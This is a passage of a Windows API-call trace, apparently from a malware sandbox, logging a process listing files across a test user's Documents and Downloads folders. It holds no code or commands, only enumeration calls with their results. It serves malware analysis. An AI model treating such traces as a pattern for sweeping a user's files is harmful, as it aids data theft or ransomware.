nFileSizeHigh=0x0, nFileSizeLow=0xe7b2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="xJT0OcisPj-xq.jpg", cAlternateFileName="XJT0OC~1.JPG")) returned 1 [0056.392] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x964ee260, ftCreationTime.dwHighDateTime=0x1d4d045, ftLastAccessTime.dwLowDateTime=0xfe86900, ftLastAccessTime.dwHighDateTime=0x1d4ca9e, ftLastWriteTime.dwLowDateTime=0xfe86900, ftLastWriteTime.dwHighDateTime=0x1d4ca9e, nFileSizeHigh=0x0, nFileSizeLow=0x366f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="xrWMPRPigWwu3vXxOU1.wav", cAlternateFileName="XRWMPR~1.WAV")) returned 1 [0056.392] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e17eff0, ftCreationTime.dwHighDateTime=0x1d4cb54, ftLastAccessTime.dwLowDateTime=0x1b3496f0, ftLastAccessTime.dwHighDateTime=0x1d4d2b2, ftLastWriteTime.dwLowDateTime=0x1b3496f0, ftLastWriteTime.dwHighDateTime=0x1d4d2b2, nFileSizeHigh=0x0, nFileSizeLow=0xb7aa, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ZoOnp.swf", cAlternateFileName="")) returned 1 [0056.392] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x87a6ff20, ftCreationTime.dwHighDateTime=0x1d4c859, ftLastAccessTime.dwLowDateTime=0xa6491760, ftLastAccessTime.dwHighDateTime=0x1d4c6e7, ftLastWriteTime.dwLowDateTime=0xa6491760, ftLastWriteTime.dwHighDateTime=0x1d4c6e7, nFileSizeHigh=0x0, nFileSizeLow=0x16e06, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ZyTEBApAQsy0 u.jpg", cAlternateFileName="ZYTEBA~1.JPG")) returned 1 [0056.392] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xacfc63a0, ftCreationTime.dwHighDateTime=0x1d4cc87, ftLastAccessTime.dwLowDateTime=0x1dec9680, ftLastAccessTime.dwHighDateTime=0x1d4c9a8, ftLastWriteTime.dwLowDateTime=0x1dec9680, ftLastWriteTime.dwHighDateTime=0x1d4c9a8, nFileSizeHigh=0x0, nFileSizeLow=0xff99, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="z_xjT1PbK9g5.mp3", cAlternateFileName="Z_XJT1~1.MP3")) returned 1 [0056.392] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x891324e0, ftCreationTime.dwHighDateTime=0x1d4c9af, ftLastAccessTime.dwLowDateTime=0x27cace10, ftLastAccessTime.dwHighDateTime=0x1d4d123, ftLastWriteTime.dwLowDateTime=0x27cace10, ftLastWriteTime.dwHighDateTime=0x1d4d123, nFileSizeHigh=0x0, nFileSizeLow=0xc043, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_FKxFEiW.m4a", cAlternateFileName="")) returned 1 [0056.392] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x891324e0, ftCreationTime.dwHighDateTime=0x1d4c9af, ftLastAccessTime.dwLowDateTime=0x27cace10, ftLastAccessTime.dwHighDateTime=0x1d4d123, ftLastWriteTime.dwLowDateTime=0x27cace10, ftLastWriteTime.dwHighDateTime=0x1d4d123, nFileSizeHigh=0x0, nFileSizeLow=0xc043, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_FKxFEiW.m4a", cAlternateFileName="")) returned 0 [0056.392] FindClose (in: hFindFile=0x68d798 | out: hFindFile=0x68d798) returned 1 [0056.393] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257668 | out: hHeap=0x660000) returned 1 [0056.393] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3261528 | out: hHeap=0x660000) returned 1 [0056.393] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0056.393] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0056.393] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0056.393] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0056.393] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebd0 | out: hHeap=0x660000) returned 1 [0056.393] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0056.393] PathFindFileNameW (pszPath="") returned="" [0056.393] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6ff2490, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x6ff2490, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68d798 [0056.393] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b040 | out: hHeap=0x660000) returned 1 [0056.393] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6ff2490, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x6ff2490, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0056.393] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4c20130, ftCreationTime.dwHighDateTime=0x1d577a5, ftLastAccessTime.dwLowDateTime=0x93ba5690, ftLastAccessTime.dwHighDateTime=0x1d58578, ftLastWriteTime.dwLowDateTime=0x93ba5690, ftLastWriteTime.dwHighDateTime=0x1d58578, nFileSizeHigh=0x0, nFileSizeLow=0x15d50, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="-zw2kUwzHbrh6GhQEKb.pptx", cAlternateFileName="-ZW2KU~1.PPT")) returned 1 [0056.393] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xecfb9bf0, ftCreationTime.dwHighDateTime=0x1d50c7f, ftLastAccessTime.dwLowDateTime=0x2fc13690, ftLastAccessTime.dwHighDateTime=0x1d577c2, ftLastWriteTime.dwLowDateTime=0x2fc13690, ftLastWriteTime.dwHighDateTime=0x1d577c2, nFileSizeHigh=0x0, nFileSizeLow=0x15707, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="0LcY86kifJlQ7.xlsx", cAlternateFileName="0LCY86~1.XLS")) returned 1 [0056.393] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7f32e340, ftCreationTime.dwHighDateTime=0x1d55107, ftLastAccessTime.dwLowDateTime=0x21972140, ftLastAccessTime.dwHighDateTime=0x1d55d7f, ftLastWriteTime.dwLowDateTime=0x21972140, ftLastWriteTime.dwHighDateTime=0x1d55d7f, nFileSizeHigh=0x0, nFileSizeLow=0xcaaf, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="44yienfP0_mk.docx", cAlternateFileName="44YIEN~1.DOC")) returned 1 [0056.393] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1145690, ftCreationTime.dwHighDateTime=0x1d57765, ftLastAccessTime.dwLowDateTime=0xfd31b9f0, ftLastAccessTime.dwHighDateTime=0x1d58e75, ftLastWriteTime.dwLowDateTime=0xfd31b9f0, ftLastWriteTime.dwHighDateTime=0x1d58e75, nFileSizeHigh=0x0, nFileSizeLow=0xef8f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="4QdlKGracmIsfBv8Rj5U.xlsx", cAlternateFileName="4QDLKG~1.XLS")) returned 1 [0056.393] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf11920f0, ftCreationTime.dwHighDateTime=0x1d52a6f, ftLastAccessTime.dwLowDateTime=0xc46c52d0, ftLastAccessTime.dwHighDateTime=0x1d5104c, ftLastWriteTime.dwLowDateTime=0xc46c52d0, ftLastWriteTime.dwHighDateTime=0x1d5104c, nFileSizeHigh=0x0, nFileSizeLow=0xde55, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="aam-uk.xlsx", cAlternateFileName="AAM-UK~1.XLS")) returned 1 [0056.393] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb1cdeff0, ftCreationTime.dwHighDateTime=0x1d4d53a, ftLastAccessTime.dwLowDateTime=0xe5b9dae0, ftLastAccessTime.dwHighDateTime=0x1d4ce82, ftLastWriteTime.dwLowDateTime=0xe5b9dae0, ftLastWriteTime.dwHighDateTime=0x1d4ce82, nFileSizeHigh=0x0, nFileSizeLow=0x12167, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ahBvw6Tj3LoXOmjTDa.pptx", cAlternateFileName="AHBVW6~1.PPT")) returned 1 [0056.393] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d207440, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0056.393] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x33d387b0, ftCreationTime.dwHighDateTime=0x1d50f0d, ftLastAccessTime.dwLowDateTime=0xce9c1d60, ftLastAccessTime.dwHighDateTime=0x1d56977, ftLastWriteTime.dwLowDateTime=0xce9c1d60, ftLastWriteTime.dwHighDateTime=0x1d56977, nFileSizeHigh=0x0, nFileSizeLow=0x16163, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="dY6y1t7mu6jrMGEl.pptx", cAlternateFileName="DY6Y1T~1.PPT")) returned 1 [0056.393] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xef941140, ftCreationTime.dwHighDateTime=0x1d585b9, ftLastAccessTime.dwLowDateTime=0x5e581db0, ftLastAccessTime.dwHighDateTime=0x1d59172, ftLastWriteTime.dwLowDateTime=0x5e581db0, ftLastWriteTime.dwHighDateTime=0x1d59172, nFileSizeHigh=0x0, nFileSizeLow=0xb8cc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="e3Nt7XYdwW.docx", cAlternateFileName="E3NT7X~1.DOC")) returned 1 [0056.393] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x437af540, ftCreationTime.dwHighDateTime=0x1d593ab, ftLastAccessTime.dwLowDateTime=0xb77094b0, ftLastAccessTime.dwHighDateTime=0x1d51a42, ftLastWriteTime.dwLowDateTime=0xb77094b0, ftLastWriteTime.dwHighDateTime=0x1d51a42, nFileSizeHigh=0x0, nFileSizeLow=0x11def, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="fyZw8q.pptx", cAlternateFileName="FYZW8Q~1.PPT")) returned 1 [0056.393] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8c76720, ftCreationTime.dwHighDateTime=0x1d5443c, ftLastAccessTime.dwLowDateTime=0xbddb4e60, ftLastAccessTime.dwHighDateTime=0x1d58d3f, ftLastWriteTime.dwLowDateTime=0xbddb4e60, ftLastWriteTime.dwHighDateTime=0x1d58d3f, nFileSizeHigh=0x0, nFileSizeLow=0x1245a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="iY-CcZnqhK2oNX.xlsx", cAlternateFileName="IY-CCZ~1.XLS")) returned 1 [0056.393] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x109f0170, ftCreationTime.dwHighDateTime=0x1d50a5d, ftLastAccessTime.dwLowDateTime=0xdbe66a50, ftLastAccessTime.dwHighDateTime=0x1d513ca, ftLastWriteTime.dwLowDateTime=0xdbe66a50, ftLastWriteTime.dwHighDateTime=0x1d513ca, nFileSizeHigh=0x0, nFileSizeLow=0x175f8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="jcZ5HOv.docx", cAlternateFileName="JCZ5HO~1.DOC")) returned 1 [0056.394] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49d48050, ftCreationTime.dwHighDateTime=0x1d544aa, ftLastAccessTime.dwLowDateTime=0x89941f80, ftLastAccessTime.dwHighDateTime=0x1d52366, ftLastWriteTime.dwLowDateTime=0x89941f80, ftLastWriteTime.dwHighDateTime=0x1d52366, nFileSizeHigh=0x0, nFileSizeLow=0x1a39, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="jFhfFrSxF58Y6JuYP.pptx", cAlternateFileName="JFHFFR~1.PPT")) returned 1 [0056.394] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x625aa6a0, ftCreationTime.dwHighDateTime=0x1d4d366, ftLastAccessTime.dwLowDateTime=0x7a991140, ftLastAccessTime.dwHighDateTime=0x1d4c559, ftLastWriteTime.dwLowDateTime=0x7a991140, ftLastWriteTime.dwHighDateTime=0x1d4c559, nFileSizeHigh=0x0, nFileSizeLow=0x6ee6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="lJq7q-PX9DWbR8t8z.doc", cAlternateFileName="LJQ7Q-~1.DOC")) returned 1 [0056.394] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Music", cAlternateFileName="MYMUSI~1")) returned 1 [0056.394] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Pictures", cAlternateFileName="MYPICT~1")) returned 1 [0056.394] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x9e9e4460, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Shapes", cAlternateFileName="MYSHAP~1")) returned 1 [0056.394] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 1 [0056.394] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a7a9f80, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x5c4f8e60, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x5c4f8e60, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Outlook Files", cAlternateFileName="OUTLOO~1")) returned 1 [0056.394] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c774d20, ftCreationTime.dwHighDateTime=0x1d4c565, ftLastAccessTime.dwLowDateTime=0xa9288bc0, ftLastAccessTime.dwHighDateTime=0x1d4cf5a, ftLastWriteTime.dwLowDateTime=0xa9288bc0, ftLastWriteTime.dwHighDateTime=0x1d4cf5a, nFileSizeHigh=0x0, nFileSizeLow=0xd918, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="q_n6bOaeAdhkjfo2mhI.docx", cAlternateFileName="Q_N6BO~1.DOC")) returned 1 [0056.394] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf303f550, ftCreationTime.dwHighDateTime=0x1d4ca59, ftLastAccessTime.dwLowDateTime=0x519769b0, ftLastAccessTime.dwHighDateTime=0x1d4cf39, ftLastWriteTime.dwLowDateTime=0x519769b0, ftLastWriteTime.dwHighDateTime=0x1d4cf39, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="R4I1Q ij0VYYLZ2qE", cAlternateFileName="R4I1QI~1")) returned 1 [0056.394] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcb20c760, ftCreationTime.dwHighDateTime=0x1d4c857, ftLastAccessTime.dwLowDateTime=0xd03060c0, ftLastAccessTime.dwHighDateTime=0x1d4cede, ftLastWriteTime.dwLowDateTime=0xd03060c0, ftLastWriteTime.dwHighDateTime=0x1d4cede, nFileSizeHigh=0x0, nFileSizeLow=0xe12c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SfzjItAk.ots", cAlternateFileName="")) returned 1 [0056.394] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x946fcb80, ftCreationTime.dwHighDateTime=0x1d55673, ftLastAccessTime.dwLowDateTime=0x65181a70, ftLastAccessTime.dwHighDateTime=0x1d56499, ftLastWriteTime.dwLowDateTime=0x65181a70, ftLastWriteTime.dwHighDateTime=0x1d56499, nFileSizeHigh=0x0, nFileSizeLow=0xafed, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="tfEuvyompjnimS.xlsx", cAlternateFileName="TFEUVY~1.XLS")) returned 1 [0056.394] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x662fcdf0, ftCreationTime.dwHighDateTime=0x1d5283e, ftLastAccessTime.dwLowDateTime=0xa97b4c40, ftLastAccessTime.dwHighDateTime=0x1d565df, ftLastWriteTime.dwLowDateTime=0xa97b4c40, ftLastWriteTime.dwHighDateTime=0x1d565df, nFileSizeHigh=0x0, nFileSizeLow=0x166bf, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="uvaDFzE.docx", cAlternateFileName="UVADFZ~1.DOC")) returned 1 [0056.394] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70150a40, ftCreationTime.dwHighDateTime=0x1d54e8d, ftLastAccessTime.dwLowDateTime=0x332545c0, ftLastAccessTime.dwHighDateTime=0x1d52497, ftLastWriteTime.dwLowDateTime=0x332545c0, ftLastWriteTime.dwHighDateTime=0x1d52497, nFileSizeHigh=0x0, nFileSizeLow=0xa626, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="vShBQE5akxJRPT.pptx", cAlternateFileName="VSHBQE~1.PPT")) returned 1 [0056.394] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x66db64a0, ftCreationTime.dwHighDateTime=0x1d530ac, ftLastAccessTime.dwLowDateTime=0xb8a094e0, ftLastAccessTime.dwHighDateTime=0x1d518b0, ftLastWriteTime.dwLowDateTime=0xb8a094e0, ftLastWriteTime.dwHighDateTime=0x1d518b0, nFileSizeHigh=0x0, nFileSizeLow=0x9882, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Xe72pRvBTnt.docx", cAlternateFileName="XE72PR~1.DOC")) returned 1 [0056.394] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x66556860, ftCreationTime.dwHighDateTime=0x1d4cedb, ftLastAccessTime.dwLowDateTime=0x88c5d230, ftLastAccessTime.dwHighDateTime=0x1d4cbb2, ftLastWriteTime.dwLowDateTime=0x88c5d230, ftLastWriteTime.dwHighDateTime=0x1d4cbb2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="xw_W- RtiM1Q0r", cAlternateFileName="XW_W-R~1")) returned 1 [0056.394] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x66556860, ftCreationTime.dwHighDateTime=0x1d4cedb, ftLastAccessTime.dwLowDateTime=0x88c5d230, ftLastAccessTime.dwHighDateTime=0x1d4cbb2, ftLastWriteTime.dwLowDateTime=0x88c5d230, ftLastWriteTime.dwHighDateTime=0x1d4cbb2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="xw_W- RtiM1Q0r", cAlternateFileName="XW_W-R~1")) returned 0 [0056.394] FindClose (in: hFindFile=0x68d798 | out: hFindFile=0x68d798) returned 1 [0056.394] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257668 | out: hHeap=0x660000) returned 1 [0056.394] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b4b8 | out: hHeap=0x660000) returned 1 [0056.394] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0056.394] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\") returned="Downloads\\" [0056.394] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0056.394] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0056.394] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebd0 | out: hHeap=0x660000) returned 1 [0056.394] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0056.395] PathFindFileNameW (pszPath="") returned="" [0056.395] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68d798 [0056.395] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b658 | out: hHeap=0x660000) returned 1 [0056.395] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0056.395] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0056.395] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0056.395] FindClose (in: hFindFile=0x68d798 | out: hFindFile=0x68d798) returned 1 [0056.395] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257668 | out: hHeap=0x660000) returned 1 [0056.395] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b4b8 | out: 